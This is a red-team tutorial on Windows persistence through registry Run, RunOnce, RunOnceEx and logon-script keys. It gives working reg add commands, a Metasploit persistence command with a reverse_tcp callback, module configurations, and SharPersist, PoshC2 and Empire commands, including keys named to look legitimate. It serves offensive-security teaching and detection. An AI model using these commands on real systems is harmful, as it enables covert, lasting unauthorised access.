Getting an initial foothold inside a network during a red team operation is a time consuming task. Therefore persistence is key to a successful red team operation as will enable the team to focus on the objectives of the engagement without losing the communication with the command and control server.

Creating registry keys that will execute an arbitrary payload during Windows logon is one of the oldest tricks in the red team playbooks. This persistence technique requires the creation of registry run keys. Various threat actors and known tools such as Metasploit, Empire and SharPersist provide this capability therefore a mature SOC team will be able to detect this malicious activity.

Terminal

Registry keys can be added from the terminal to the run keys to achieve persistence. These keys will contain a reference to the actual payload that will executed when a user logs in. The following registry locations is known to be used by threat actors and red teams that use this method of persistence.

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
Registry – Run Keys Current User

If elevated credentials have been obtained it is preferred to use the Local Machine registry locations instead of the Current User as the payload will executed every time that the system boots regardless of the user who is authenticating with the system.

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
Registry – Run Keys Local Machine

During the next logon the payloads will executed and will communicate back to Meterpeter.

Meterpreter – Run Keys

Oddvar Moe discovered two more registry locations that could allow red teams to achieve persistence by executing either an arbitrary payload or a DLL. These will be executed during logon and require admin level privileges.

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.dll"
Meterpreter – Arbitrary DLL

Metasploit

Metasploit Framework supports persistence via the registry by using a Meterpreter script and a post exploitation module. The Meterpreter script will create a payload in the form of a VBS script which will be dropped to disk and will create a registry key that will run the payload during logon of the user.

run persistence -U -P windows/x64/meterpreter/reverse_tcp -i 5 -p 443 -r 10.0.2.21
Metasploit – Meterpreter Persistence Script

The next time that the user will login with the system a new Meterpreter session will open.

Metasploit – Meterpreter Session

Alternatively there is a post exploitation module which can be used for persistence. The module require the following configuration and will drop an executable at a writable location on the compromised system.

use post/windows/manage/persistence_exe
set REXEPATH /tmp/pentestlab.exe
set SESSION 2
set STARTUP USER
set LOCALEXEPATH C:\\tmp
run
Metasploit – Persistence Post Exploitation Module Configuration

The module will use the registry location of the current user since the USER has been selected as an option.

Metasploit – Persistence Post Exploitation Module

The module can be configured to create a registry key in the HKLM location if SYSTEM level privileges have been obtained. The STARTUP option will need to be changed to SYSTEM.

set STARTUP SYSTEM
Metasploit – Persistence Module as SYSTEM

SharPersist

SharPersist is a tool developed by Brett Hawkins in C# that combines a variety of persistence techniques including the addition of registry run keys. This toolkit can be loaded into various command and control frameworks that support reflective loading such as Cobalt Strike and PoshC2. The following command will create a registry key that will execute an arbitrary payload from the same registry location as the Metasploit Framework modules.

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c C:\tmp\pentestlab.exe" -k "hkcurun" -v "pentestlab" -m add
SharPersist – Registry as User

If elevated access has been obtained modifying the command to install the registry key in the Local Machine location to achieve persistence for all users.

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c C:\tmp\pentestlab.exe" -k "hklmrun" -v "pentestlab" -m add -o env
SharPersist – Registry as SYSTEM

SharPersist contains also persistence capabilities via the RunOnce and RunOnceEx registry keys. The following commands will create registry keys in these locations that will execute arbitrary payloads.

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c pentestlab.exe" -k "hklmrunonce" -v "Pentestlab" -m add
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c pentestlab.exe" -k "hklmrunonceex" -v "Pentestlab" -m add
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c pentestlab.exe" -k "hkcurunonce" -v "Pentestlab" -m add
SharPersist – RunOnce Registry Key

SharPersist provides also an option to use another registry location for persistence (UserInitMprLogonScript).

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c pentestlab.exe" -k "logonscript" -m add
SharPersist – Logon Script

PoshC2

PoshC2 supports various persistence capabilities which include the method of registry run keys. The following command will create two registry keys in the target host.

install-persistence
PoshC2 – Persistence

The registry Run key will have the name of IEUpdate in order to look legitimate and the second key will hide in the registry as a wallpaper.

PoshC2 – Registry Run Keys

Empire

Empire contains two modules that are aligned with the persistence technique via Registry Run keys if Empire is being used as a command and control. Depending on the level of privileges these modules will attempt to install a base64 payload in the following registry locations:

  • HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug
  • HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug
Empire – Debug Registry Key Payload
usemodule persistence/userland/registry
usemodule persistence/elevated/registry*
Empire – Persistence Registry Module

Another registry key will be created under the name Updater that will contain the command to execute. PowerShell will attempt to run in the next logon the payload that is stored in the Debug key to achieve persistence.

  • HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Empire – Registry Run Key

References

Advertisements